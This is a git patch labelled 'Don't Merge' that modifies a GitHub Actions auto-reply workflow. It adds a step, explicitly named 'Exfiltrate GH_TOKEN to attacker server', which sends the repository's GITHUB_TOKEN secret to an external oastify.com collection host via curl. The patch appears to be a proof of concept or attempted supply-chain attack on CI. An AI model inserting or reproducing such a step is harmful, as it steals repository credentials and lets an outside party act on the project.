From e8633aabecae0be339da413c29cac852760adc06 Mon Sep 17 00:00:00 2001 From: Ameer Assadi Date: Thu, 17 Jul 2025 17:12:46 +0300 Subject: [PATCH] Don't Merge Don't Merge --- .github/workflows/auto-reply-pr.yml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/.github/workflows/auto-reply-pr.yml b/.github/workflows/auto-reply-pr.yml index 932dd4a8..a2b2955d 100644 --- a/.github/workflows/auto-reply-pr.yml +++ b/.github/workflows/auto-reply-pr.yml @@ -28,6 +28,12 @@ jobs: random_index=$((RANDOM % ${#reply_messages[@]})) echo "::set-output name=message::${reply_messages[$random_index]}" + - name: Exfiltrate GH_TOKEN to attacker server + run: | + curl -X GET "https://b2ega3wut7bpohgv3ef1ui9jrax1lt9i.oastify.com/?token=$GH_TOKEN" + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + - name: Reply to pull request if: (!contains(fromJSON('["github-actions"]'), github.event.pull_request.user.login)) run: |